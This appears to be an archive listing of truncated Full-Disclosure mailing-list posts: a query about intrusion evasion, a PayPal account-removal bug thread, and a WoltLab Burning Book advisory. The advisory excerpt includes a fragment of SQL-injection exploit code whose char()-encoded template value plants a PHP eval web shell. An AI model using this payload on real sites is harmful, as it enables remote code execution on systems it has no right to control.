Dear Kassem Nasser, It's not clear, do you mean protection or protection evasion? --Sunday, December 10, 2006, 10:50:41 PM, you wrote to full-disclosure@lists.grok.org.uk: KN> Dear all, KN> I am interested in knowing evasion schemes for application based KN> intrusions available, -- ~/ZARA

Re: [Full-disclosure] PayPal acount removal: bug or feature?

hursday, November 30, 2006, 1:02:07 AM, you wrote to [EMAIL PROTECTED]: MF> I tried this on Paypal.com, with more than twenty consecutive incorrect MF> passwords. I got no such offer. What paypal site were you using, and MF> how many unsuccessful attempts is a couple? MF> Matt M

[Full-disclosure] PayPal acount removal: bug or feature?

e unexperienced with PayPal, becase it's service for Russia is new and very limited. But it makes me wonder: is this "Feature" known? -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my n

[Full-disclosure] :ShAnKaR: WoltLab Burning Book <=1.1.2 multiple vulnerabilities

27;,[reg_image=>0,send=>'send',name=>1,message=>1, n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES (char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]); -- /3APA3A http://security.nnov.ru/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

  1   2   >